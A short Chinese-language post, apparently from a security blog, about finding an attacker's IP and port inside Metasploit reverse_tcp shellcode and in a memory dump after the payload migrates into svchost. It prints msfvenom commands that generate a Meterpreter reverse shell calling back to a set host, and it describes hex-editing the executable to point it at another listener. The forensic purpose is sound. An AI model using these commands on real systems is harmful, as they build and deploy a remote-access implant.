msf原生shellcode迁移进程后如何获取攻击者ip仅为ip及端口
木有图，看一下就晓得了
偶尔看到了这个问题，做了一些倒推测试之后得出来的结果

倒推过程
shellcode
msf生成一段shellcode，产生的一组16进制数据

msfvenmon  -p windows/meterpreter/reverse_tcp LHOST=192.168.157.13 LPORT=1111 -f c

产生的16进制数据会带有ip以及端口信息，直接将ip和端口转换为16进制 c0 a8 9d 0d 0457，然后ctrf+f大法可以直接搜索到对应位置
在产生的文件中是以 0457 c0a8 9d0d 显示的

生成exe格式

msfvenmon  -p windows/meterpreter/reverse_tcp LHOST=192.168.157.13 LPORT=1111 -f exe -o shell.exe

使用od展开shell.exe

od -x shell.exe

然后继续使用ctrf+f大法，会发现exe中的ip端口是以 a8c0 0d9d 5704 排列的，那么进入到正文

创建监听，将生成的exe丢到目标机上以管理员身份运行，迁移进程 migrate 这里以svchost为例，迁移之后，使用任务管理器找到对应的pid创建转储文件，会生成svchost.dmp文件，依旧老套路

od -x scvhost.dmp  

以16进制打开 使用ctrf+f大法直接搜索a8 (c0太多了，看不过来)

其实这里的shellcode也是以 a8c0 0d9d 5704 排列

那么找一个在线16进制编译器，将上文生成的shell.exe的a8c0 0d9d 5704 修改为另外一个kali监听的ip以及端口，正常执行后也是可以获取倒shell的

但是，这都是倒推，已经有了攻击者ip以及端口进行反向查找

正向推断，有以下几个问题

如果获取到的dmp文件内容全部转换为10进制，那么全都是数字，无法进行有效识别

如果不确定迁移的进程位置是否需要整个操作系统dump内存进行查到，又会回到第一个问题

问过带佬后，得出一个可能可行的路线

卡巴斯基内存扫描获取木马签名，使用Volatility进行yara规则匹配，然后dump内存，转换为10进制

首先让不让安装卡巴另说，操作系统dump也忒大了

当然了 通过查看网络连接等其他方式也是可以获取到攻击者ip以及端口的

有别的想法的老哥可以私信